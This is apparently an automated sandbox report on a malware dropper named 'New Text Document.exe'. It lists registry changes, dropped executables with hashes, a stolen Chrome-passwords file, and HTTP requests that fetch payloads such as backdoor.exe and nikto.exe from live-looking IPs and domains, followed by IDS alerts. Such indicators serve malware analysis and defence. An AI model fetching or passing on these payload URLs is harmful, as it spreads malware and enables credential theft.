remotesigned -File " \ | GET Comodo dm: Kaspersky Lab Panda Security <c> -unicode- cmd /C RMDIR /s/q rundll32.exe Bitdefender && &unit= https:// cmd bi: /k \0000 Avira WinDefender SYSTEM\ControlSet001\Services\BasicDisplay\Video random og: http:// -- SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders d1 os: POST id: Powershell.exe DefaultSettings.XResolution r= GetNativeSystemInfo e0 SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ComputerName | |||||||||||||||
| 1036 | "C:\Windows\system32\gpupdate.exe" /force | C:\Windows\System32\gpupdate.exe | — | powershell.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Group Policy Update Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
248 285
Read events
246 064
Write events
1 697
Delete events
524
Modification events
| (PID) Process: | (3968) New Text Document.bin.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3968) New Text Document.bin.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3968) New Text Document.bin.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3968) New Text Document.bin.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (3968) New Text Document.bin.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (3968) New Text Document.bin.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (3968) New Text Document.bin.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (3968) New Text Document.bin.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry |
| Operation: | delete value | Name: | AddToFavoritesInitialSelection |
Value: | |||
| (PID) Process: | (3968) New Text Document.bin.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry |
| Operation: | delete value | Name: | AddToFeedsInitialSelection |
Value: | |||
| (PID) Process: | (1764) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
Executable files
167
Suspicious files
290
Text files
529
Unknown types
100
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2888 | nikto.exe | C:\ProgramData\MPGPH131\MPGPH131.exe | executable | |
MD5:7674FCC31657BDBB6C4DE71151044B50 | SHA256:D1C88D2CA36A260F973712D1ACC812D0014C0ABD08F5994A8E97507624A013A1 | |||
| 2712 | New Text Document.exe | C:\Users\admin\Desktop\a\tiktok.exe | executable | |
MD5:6C93FC68E2F01C20FB81AF24470B790C | SHA256:64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580 | |||
| 3968 | New Text Document.bin.exe | C:\Users\admin\Desktop\Пароли Chrome.csv | csv | |
MD5:64F50AFB35DD16EE46F187015CEE84CE | SHA256:C2D389870DE77426A31A8C478E0FDDCBBEA7A3733B453806317914E6F946EA91 | |||
| 2888 | nikto.exe | C:\Users\admin\AppData\Local\RageMP131\RageMP131.exe | executable | |
MD5:7674FCC31657BDBB6C4DE71151044B50 | SHA256:D1C88D2CA36A260F973712D1ACC812D0014C0ABD08F5994A8E97507624A013A1 | |||
| 2448 | New Text Document.exe | C:\Users\admin\Desktop\a\qauasariscrypted.exe | executable | |
MD5:F9FE6EA6A75B97B560915C340D605C29 | SHA256:0304077F01554220C38838134C2AF09F47BBDA2BBA8423DA5E7D3219FB292973 | |||
| 588 | xie.exe | C:\Users\admin\AppData\Local\Temp\nsx7DBF.tmp\INetC.dll | executable | |
MD5:92EC4DD8C0DDD8C4305AE1684AB65FB0 | SHA256:5520208A33E6409C129B4EA1270771F741D95AFE5B048C2A1E6A2CC2AD829934 | |||
| 2448 | New Text Document.exe | C:\Users\admin\Desktop\a\pei.exe | executable | |
MD5:F33C75710D0E0463A2528E619C2EE382 | SHA256:EC7DD08D03D5D4142C82FC04CEA7E948D05641B0A3008A0D8A00B0421B5B04F9 | |||
| 2712 | New Text Document.exe | C:\Users\admin\Desktop\a\HJC.exe | executable | |
MD5:336B7B1D3242C890882D18C72A705025 | SHA256:F46A12CC6D680AFCFB1062A99364A5D5C564FF5D5965DC959FC207D9A1313C99 | |||
| 1764 | New Text Document.exe | C:\Users\admin\Desktop\a\xie.exe | executable | |
MD5:F44BCEDFB71262DD1484BCBB63122BA5 | SHA256:AC8D45E6A98571D5D6C67F7B60CFDC84E2838F20D815D29E7A229539AB89C468 | |||
| 2888 | nikto.exe | C:\Users\admin\AppData\Local\Temp\rage131MP.tmp | text | |
MD5:2EE6A8D62B393422F8EC06B89F379F8C | SHA256:D3D46091320F2D96905D12D48DD1DBDA27CDE541D26F73AB5B51FCFC61C9CE29 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
200
TCP/UDP connections
429
DNS requests
134
Threats
688
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
588 | xie.exe | GET | — | 104.21.13.240:80 | http://zhngxie.wf/22_2/huge.dat | unknown | — | — | unknown |
1764 | New Text Document.exe | GET | — | 129.154.46.185:32768 | http://129.154.46.185:32768/backdoor.exe | unknown | — | — | unknown |
2448 | New Text Document.exe | GET | 200 | 193.233.132.139:80 | http://193.233.132.139/gavno/nikto.exe | unknown | — | — | unknown |
1824 | New Text Document.exe | GET | — | 129.154.46.185:32768 | http://129.154.46.185:32768/file%20explorer.exe | unknown | — | — | unknown |
2808 | New Text Document.exe | GET | 200 | 185.196.10.233:80 | http://gjhfhgdg.insane.wang/main/qauasariscrypted.exe | unknown | — | — | unknown |
2448 | New Text Document.exe | GET | 200 | 91.92.255.162:80 | http://91.92.255.162/Exodus.exe | unknown | — | — | unknown |
2448 | New Text Document.exe | GET | 200 | 185.196.10.233:80 | http://gjhfhgdg.insane.wang/client/Fzonsvup.exe | unknown | — | — | unknown |
2712 | New Text Document.exe | GET | 200 | 185.172.128.203:80 | http://185.172.128.203/tiktok.exe | unknown | — | — | unknown |
2712 | New Text Document.exe | GET | 200 | 125.7.253.10:80 | http://cajgtus.com/files/1/build3.exe | unknown | — | — | unknown |
3012 | pei.exe | GET | 200 | 185.215.113.66:80 | http://twizt.net/newtpp.exe | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
1764 | New Text Document.exe | 151.101.66.49:443 | urlhaus.abuse.ch | FASTLY | US | unknown |
1764 | New Text Document.exe | 104.21.13.240:443 | zhngxie.wf | CLOUDFLARENET | — | unknown |
1764 | New Text Document.exe | 129.154.46.185:32768 | — | ORACLE-BMC-31898 | IN | unknown |
588 | xie.exe | 104.21.13.240:80 | zhngxie.wf | CLOUDFLARENET | — | unknown |
1824 | New Text Document.exe | 151.101.2.49:443 | urlhaus.abuse.ch | FASTLY | US | unknown |
1824 | New Text Document.exe | 129.154.46.185:32768 | — | ORACLE-BMC-31898 | IN | unknown |
1596 | New Text Document.exe | 151.101.2.49:443 | urlhaus.abuse.ch | FASTLY | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
urlhaus.abuse.ch |
| whitelisted |
zhngxie.wf |
| unknown |
cajgtus.com |
| unknown |
gjhfhgdg.insane.wang |
| malicious |
twizt.net |
| unknown |
github.com |
| shared |
objects.githubusercontent.com |
| shared |
ipinfo.io |
| shared |
db-ip.com |
| whitelisted |
ctldl.windowsupdate.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
588 | xie.exe | Potentially Bad Traffic | ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) |
588 | xie.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1764 | New Text Document.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
1764 | New Text Document.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
1764 | New Text Document.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1764 | New Text Document.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
1764 | New Text Document.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1824 | New Text Document.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
1824 | New Text Document.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
1824 | New Text Document.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
43 ETPRO signatures available at the full report
Process | Message |
|---|---|
nikto.exe | Dk43l_dwmk438* |
nikto.exe | ewetwertyer eytdryrtdy |
nikto.exe | td ydrthrhfty |
steamworks.exe | SMessageLoop::Run - exiting,code = 1 SOUI::SMessageLoop::Run E:\suoha\onekeyfun\soui\SOUI\src\core\SMsgLoop.cpp:49
|
nikto.exe | er ert 346 34634 6ch |
amadka.exe |
%s------------------------------------------------
--- Themida Professional ---
--- (c)2012 Oreans Technologies ---
------------------------------------------------
|
explorta.exe |
%s------------------------------------------------
--- Themida Professional ---
--- (c)2012 Oreans Technologies ---
------------------------------------------------
|
4h92v03hMhnmupQRAOq4.exe |
%s------------------------------------------------
--- Themida Professional ---
--- (c)2012 Oreans Technologies ---
------------------------------------------------
|
explorta.exe |
%s------------------------------------------------
--- Themida Professional ---
--- (c)2012 Oreans Technologies ---
------------------------------------------------
|
amert.exe |
%s------------------------------------------------
--- Themida Professional ---
--- (c)2012 Oreans Technologies ---
------------------------------------------------
|